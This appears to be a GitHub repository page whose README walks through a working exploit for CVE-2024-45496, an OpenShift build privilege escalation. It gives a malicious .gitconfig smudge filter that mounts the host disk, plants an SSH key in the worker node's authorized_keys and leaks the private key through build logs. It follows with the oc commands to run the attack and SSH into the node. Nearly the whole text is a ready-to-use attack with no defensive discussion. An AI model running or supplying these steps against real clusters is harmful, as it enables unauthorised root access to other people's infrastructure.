Skip to content

pwnc4t/cve-2024-45496

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
.gitattributes
.gitattributes
 
 
Dockerfile
Dockerfile
 
 
config.txt
config.txt
 
 
readme.md
readme.md
 
 

Repository files navigation

clone the repository containing the required files:

git clone https://github.com/pwnc4t/cve-2024-45496.git
cd cve-2024-45496

the repository contains a Dockerfile and .gitattributes file that maps the Dockerfile to a filter named "dockerfile".

create a malicious git config file with the exploit payload:

# .gitconfig
[safe]
    directory = *
[filter "dockerfile"]
    smudge = "mkdir -p /mnt/h && mount /dev/vda4 /mnt/h && ssh-keygen -t ed25519 -f /tmp/k -N '' -q && mkdir -p /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh && cat /tmp/k.pub >> /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys && chmod 600 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys && chown 1000:1000 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys 2>&1 >/dev/null; cat; echo; cat /tmp/k | while IFS= read -r line; do echo \"RUN echo '$line'\"; done"
    required = true

the smudge filter executes during git checkout when processing the Dockerfile. it mounts the host filesystem, generates an SSH keypair, injects the public key to the host's authorized_keys, and embeds the private key into the Dockerfile as RUN commands for extraction via build logs.

create a secret from the .gitconfig file:

oc create secret generic malicious-secret --from-file=.gitconfig

the secret will be mounted as the git configuration during the clone operation, causing git to use the malicious filter when checking out files.

create a BuildConfig that uses the malicious git configuration:

# malicious-buildconfig.yaml
apiVersion: build.openshift.io/v1
kind: BuildConfig
metadata:
  name: malicious-buildconfig
spec:
  source:
    type: Git
    git:
      uri: 'https://github.com/pwnc4t/cve-2024-45496.git'
    sourceSecret:
      name: malicious-secret  
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile

the sourceSecret injects the malicious .gitconfig into the git-clone container. during clone, git reads .gitattributes, sees the filter mapping, and executes the smudge command when checking out the Dockerfile.

apply the build configuration:

oc apply -f malicious-buildconfig.yaml

start the build and follow the logs to extract the SSH private key:

oc start-build malicious-buildconfig --follow

the build logs will show the SSH private key line by line as RUN echo commands execute. the key appears because the smudge filter embedded it into the Dockerfile during checkout.

save the private key from the build logs, set correct permissions, and establish SSH connection to the worker node:

chmod 600 exploit_key
ssh -i exploit_key core@WORKER_IP

About

openshift privilege escalation exploit

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages